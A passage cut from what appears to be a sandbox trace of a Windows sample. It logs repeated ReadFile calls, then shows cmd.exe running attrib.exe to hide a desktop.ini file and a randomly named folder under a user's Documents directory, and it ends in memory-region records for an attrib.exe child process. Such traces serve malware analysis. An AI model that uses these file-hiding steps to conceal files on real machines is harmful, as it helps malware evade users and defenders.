nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.327] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.328] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.329] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.330] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.331] ReadFile (in: hFile=0x58, lpBuffer=0x2ceba4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdd94, lpOverlapped=0x0 | out: lpBuffer=0x2ceba4*, lpNumberOfBytesRead=0x2cdd94*=0x200, lpOverlapped=0x0) returned 1 [0132.355] _close (_FileHandle=4) returned 0 [0132.355] FindNextFileW (in: hFindFile=0x3ae6d8, lpFindFileData=0x2cee08 | out: lpFindFileData=0x2cee08) returned 0 [0132.356] GetLastError () returned 0x12 [0132.356] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.356] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0132.358] _close (_FileHandle=3) returned 0 [0132.358] GetConsoleTitleW (in: lpConsoleTitle=0x2cf240, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.358] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.358] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.359] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.359] GetLastError () returned 0x2 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.359] GetLastError () returned 0x2 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.359] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.360] GetLastError () returned 0x2 [0132.360] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.360] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.360] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.360] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.360] GetConsoleTitleW (in: lpConsoleTitle=0x2cefd4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.360] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cee5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cef24 | out: lpAttributeList=0x2cee5c, lpSize=0x2cef24) returned 1 [0132.360] UpdateProcThreadAttribute (in: lpAttributeList=0x2cee5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cef1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cee5c, lpPreviousValue=0x0) returned 1 [0132.360] GetStartupInfoW (in: lpStartupInfo=0x2cee18 | out: lpStartupInfo=0x2cee18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0132.360] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.360] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ceeb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cef04 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessInformation=0x2cef04*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb98, dwThreadId=0xb80)) returned 1 [0132.366] CloseHandle (hObject=0x50) returned 1 [0132.366] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.366] GetEnvironmentStringsW () returned 0x3b2e00* [0132.366] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0132.366] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0132.404] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cedf8 | out: lpExitCode=0x2cedf8*=0x0) returned 1 [0132.404] CloseHandle (hObject=0x4c) returned 1 [0132.405] _vsnwprintf (in: _Buffer=0x2cef40, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cee04 | out: _Buffer="00000000") returned 8 [0132.405] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.405] GetEnvironmentStringsW () returned 0x3b2e00* [0132.405] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0132.405] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.405] GetEnvironmentStringsW () returned 0x3b2e00* [0132.405] FreeEnvironmentStringsW (penv=0x3b2e00) returned 1 [0132.405] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cee5c | out: lpAttributeList=0x2cee5c) [0132.405] GetConsoleTitleW (in: lpConsoleTitle=0x2cf240, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.405] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.405] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.406] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.406] GetLastError () returned 0x2 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.406] GetLastError () returned 0x2 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.406] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0xffffffff [0132.406] GetLastError () returned 0x2 [0132.407] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceadc) returned 0x3ae6d8 [0132.407] FindClose (in: hFindFile=0x3ae6d8 | out: hFindFile=0x3ae6d8) returned 1 [0132.407] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.407] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.407] GetConsoleTitleW (in: lpConsoleTitle=0x2cefd4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.407] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cee5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cef24 | out: lpAttributeList=0x2cee5c, lpSize=0x2cef24) returned 1 [0132.407] UpdateProcThreadAttribute (in: lpAttributeList=0x2cee5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cef1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cee5c, lpPreviousValue=0x0) returned 1 [0132.407] GetStartupInfoW (in: lpStartupInfo=0x2cee18 | out: lpStartupInfo=0x2cee18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0132.407] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.407] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ceeb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cef04 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"", lpProcessInformation=0x2cef04*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb64, dwThreadId=0xae8)) returned 1 [0132.412] CloseHandle (hObject=0x4c) returned 1 [0132.412] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.412] GetEnvironmentStringsW () returned 0x3b3838* [0132.412] FreeEnvironmentStringsW (penv=0x3b3838) returned 1 [0132.412] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0132.457] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cedf8 | out: lpExitCode=0x2cedf8*=0x0) returned 1 [0132.457] CloseHandle (hObject=0x50) returned 1 [0132.457] _vsnwprintf (in: _Buffer=0x2cef40, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cee04 | out: _Buffer="00000000") returned 8 [0132.457] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.457] GetEnvironmentStringsW () returned 0x3b3838* [0132.457] FreeEnvironmentStringsW (penv=0x3b3838) returned 1 [0132.457] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.457] GetEnvironmentStringsW () returned 0x3b3838* [0132.457] FreeEnvironmentStringsW (penv=0x3b3838) returned 1 [0132.457] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cee5c | out: lpAttributeList=0x2cee5c) [0132.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.457] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.457] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.457] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.457] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.458] SetConsoleInputExeNameW () returned 0x1 [0132.458] GetConsoleOutputCP () returned 0x1b5 [0132.458] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.458] exit (_Code=0) Process: id = "112" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0xaa4" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12319 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12320 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12321 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12322 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 12323 start_va = 0xa50000 end_va = 0xa56fff entry_point = 0xa50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12324 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12325 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12326 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12327 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 12328 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 